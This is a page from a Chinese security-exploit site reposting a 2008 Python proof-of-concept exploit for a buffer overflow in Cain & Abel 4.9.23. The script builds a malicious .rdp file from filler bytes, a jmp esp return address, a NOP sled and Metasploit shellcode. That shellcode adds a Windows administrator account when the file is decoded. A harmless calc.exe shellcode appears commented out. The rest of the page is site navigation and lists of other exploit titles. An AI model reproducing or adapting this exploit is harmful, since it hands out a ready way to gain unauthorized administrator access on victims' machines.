首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit
来源:encrypt3d.blogspot.com 作者:Encrypt3d 发布时间:2008-12-04  
#exploit.py
print ""
print "                 !R4Q!4N H4CK3R"
print "Cain & Abel 4.9.23 (rdp file) Buffer overflow Exploit"
print "By:Encrypt3d.M!nd"
print "encrypt3d.blogspot.com"
print "######################################################"
print "Greetz:-=Mizo=-,L!0N,El Mariachi,MiNi SpIder..and all my friends"
print "This is exploit for my PoC"
print "Tested on:Windows Xp Sp3 Patched"
print "This exploit will Create File(.rdp) and when decoding"
print "The file with Cain(Remote Desktop Password Decoder)"
print "Will Add administrator user(user) with password(pass)"
print ""

# win32_adduser -  PASS=pass EXITFUNC=seh USER=user Size=232
Encoder=PexFnstenvSub http://metasploit.com

shellcode = "\x2b\xc9\x83\xe9\xcc\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46"
shellcode+= "\xcd\x10\x60\x83\xeb\xfc\xe2\xf4\xba\x25\x54\x60\x46\xcd\x9b\x25"
shellcode+= "\x7a\x46\x6c\x65\x3e\xcc\xff\xeb\x09\xd5\x9b\x3f\x66\xcc\xfb\x29"
shellcode+= "\xcd\xf9\x9b\x61\xa8\xfc\xd0\xf9\xea\x49\xd0\x14\x41\x0c\xda\x6d"
shellcode+= "\x47\x0f\xfb\x94\x7d\x99\x34\x64\x33\x28\x9b\x3f\x62\xcc\xfb\x06"
shellcode+= "\xcd\xc1\x5b\xeb\x19\xd1\x11\x8b\xcd\xd1\x9b\x61\xad\x44\x4c\x44"
shellcode+= "\x42\x0e\x21\xa0\x22\x46\x50\x50\xc3\x0d\x68\x6c\xcd\x8d\x1c\xeb"
shellcode+= "\x36\xd1\xbd\xeb\x2e\xc5\xfb\x69\xcd\x4d\xa0\x60\x46\xcd\x9b\x08"
shellcode+= "\x7a\x92\x21\x96\x26\x9b\x99\x98\xc5\x0d\x6b\x30\x2e\x3d\x9a\x64"
shellcode+= "\x19\xa5\x88\x9e\xcc\xc3\x47\x9f\xa1\xae\x7d\x04\x68\xa8\x68\x05"
shellcode+= "\x66\xe2\x73\x40\x28\xa8\x64\x40\x33\xbe\x75\x12\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x60\x01\x35\xbe\x30\x4f\x07\x89\x54\x40\x60\xeb\x30\x0e"
shellcode+= "\x23\xb9\x30\x0c\x29\xae\x71\x0c\x21\xbf\x7f\x15\x36\xed\x51\x04"
shellcode+= "\x2b\xa4\x7e\x09\x35\xb9\x62\x01\x32\xa2\x62\x13\x66\xb8\x63\x05"
shellcode+= "\x34\xed\x3f\x21\x02\x89\x10\x60";

# and if you want to test it..this shellcode will open calc.exe
#shellcode = "\x33\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
#shellcode+= "\xab\x63\x3d\x83\xeb\xfc\xe2\xf4\x4e\x43\x27\x3d\xb2\xab\xe8\x78"
#shellcode+= "\x8e\x20\x1f\x38\xca\xaa\x8c\xb6\xfd\xb3\xe8\x62\x92\xaa\x88\x74"
#shellcode+= "\x39\x9f\xe8\x3c\x5c\x9a\xa3\xa4\x1e\x2f\xa3\x49\xb5\x6a\xa9\x30"
#shellcode+= "\xb3\x69\x88\xc9\x89\xff\x47\x39\xc7\x4e\xe8\x62\x96\xaa\x88\x5b"
#shellcode+= "\x39\xa7\x28\xb6\xed\xb7\x62\xd6\x39\xb7\xe8\x3c\x59\x22\x3f\x19"
#shellcode+= "\xb6\x68\x52\xfd\xd6\x20\x23\x0d\x37\x6b\x1b\x31\x39\xeb\x6f\xb6"
#shellcode+= "\xc2\xb7\xce\xb6\xda\xa3\x88\x34\x39\x2b\xd3\x3d\xb2\xab\xe8\x55"
#shellcode+= "\x8e\xf4\x52\xcb\xd2\xfd\xea\xc5\x31\x6b\x18\x6d\xda\x5b\xe9\x39"
#shellcode+= "\xed\xc3\xfb\xc3\x38\xa5\x34\xc2\x55\xc8\x02\x51\xd1\x85\x06\x45"
#shellcode+= "\xd7\xab\x63\x3d";

eip = "\xB7\x2F\x49\x7E" #user32.dll jmp esp 0x7E492FB7

chars = "E"*8206
print "Bu!ld!ng 3xpl0!t....Pl3453 W4!t"
print ""
file = open('cain.rdp','w')
file.write (chars+eip+eip+"\x90"*10+shellcode)
file.close()
print "D0NE!"

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Check New 4.52 (findoffice.php
·ClamAV < 0.94.2 (JPG File) Sta
·Joomla Component com_jmovies 1
·CPanel version 11.x privilege
·RadAsm <= 2.2.1.4 (.RAP File)
·serv-u7 local exp (php)
·ccTiddly 1.7.4 (cct_base) Mult
·CMS MAXSITE Component Guestboo
·EiD <= 0.92 Malformed PE File
·NULL FTP Server 1.1.0.7 SITE P
·bcoos 1.0.13 (viewcat.php cid)
·Visagesoft eXPert PDF EditorX
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved